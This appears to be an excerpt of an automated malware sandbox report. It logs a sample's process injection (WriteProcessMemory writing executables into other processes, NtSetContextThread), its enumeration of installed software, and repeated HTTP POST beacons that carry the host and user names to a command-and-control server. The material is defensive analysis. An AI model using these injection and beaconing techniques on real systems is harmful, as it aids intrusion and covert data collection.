WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ þÿÿÿuLÓôk§cßÜÆí&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁÆ¯µ{*C]}u¸ØwÉÇiíÖ(õ[!¼h¬=Ð)ÄI\íAÙU$þ6fyôKÈ\|`@óém0Ø8v¶¤.~%âïÇ¨ÎÝ$}DÜHYØÃWæ\ÃsS?½ïGmhO3Jê¹§)ûäa/§tR¡AºÕÿê4ÿÿ° Kñ9ãÉD}E/BçGüÜgnÅÚ9ô3/çÀ4è± ßKÎóÎ3¸õxÏ´sÜz¸ãî¨7iÓUØ¶ÔHuç¢:J4Ðar0YÆA¾¼O1lKz²E½±íZJ2`Aà5²ÆÅz±0}K!tÌwþl¢T`Dñ(4UÕæ!Fæ@ÜDÔ&ÿ®\|iª¡ý-Vôü>ê;ÂxkßÀ#3J$UnT¸?µÝòg\ç4&Ú3\|Fuw¤e«ãè £èn¢±>v5å.góFÃ\|,¡9UF~£ÇÖ¡.]PÓ0ÿoÚLåÂÆC°âæêÁ'=`SËJ¤øÒ´B\|×°'ëQ(÷«¹yl)2Ô;<÷Fýä@ÊZ%×ïÅÈÄ,Qñ´=Ï£¥£PöaS;qî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôÆ§S½ÜÁÙ`É5Utàô¶oý«õ`6¡âòí¦a:Æ¦m!Åcà}²{îa¯Mme®2@¾@£xbÈ^¥i>JÃå)¤±JõòÓÂ3²ÝÞo<BNPòÁbVlÎ_%Ïòrøß>Ûãù´s·äîu±ü¿c\£RôKêüM¡³¾n>÷D»5Öèõ\|9!! ÊrjH«·öã^4Ì»¢ûö©[{ ÁáâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~\| yì8Eõ¾¹?äµ÷¼F+>`V\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 3856 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 3856 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3856 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 3124 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: Ð? base_address: 0x0043a000 process_identifier: 3124 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3124 process_handle: 0x00000118	1	1

Code injection by writing an executable or DLL to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$þB `@ `¬BO`tA H.text# $ `.rsrc`&@@.reloc,@B base_address: 0x00400000 process_identifier: 3708 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 3856 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà0À¬ß à@ À@¸ÞSàN© H.text¿ À `.rsrcN©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 3124 process_handle: 0x00000118	1	1

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 6:10 p.m.	key_handle: 0x00000274 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Network activity contains more than one unique useragent (3 events)

process	Utsysc.exe	useragent
process	AppLaunch.exe	useragent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3664 called NtSetContextThread to modify thread in remote process 3708
Process injection	Process 3768 called NtSetContextThread to modify thread in remote process 3856
Process injection	Process 4092 called NtSetContextThread to modify thread in remote process 3124
NtSetContextThread Nov. 3, 2023, 6:10 p.m.	registers.eip: 1995571652 registers.esp: 3734432 registers.edi: 0 registers.eax: 4211454 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000114 process_identifier: 3708	1	0	0
NtSetContextThread Nov. 3, 2023, 6:10 p.m.	registers.eip: 1995571652 registers.esp: 3472984 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000114 process_identifier: 3856	1	0	0
NtSetContextThread Nov. 3, 2023, 6:10 p.m.	registers.eip: 1995571652 registers.esp: 3865952 registers.edi: 0 registers.eax: 4382478 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000114 process_identifier: 3124	1	0	0

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (29 events)

Time & API	Arguments	Status	Return
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
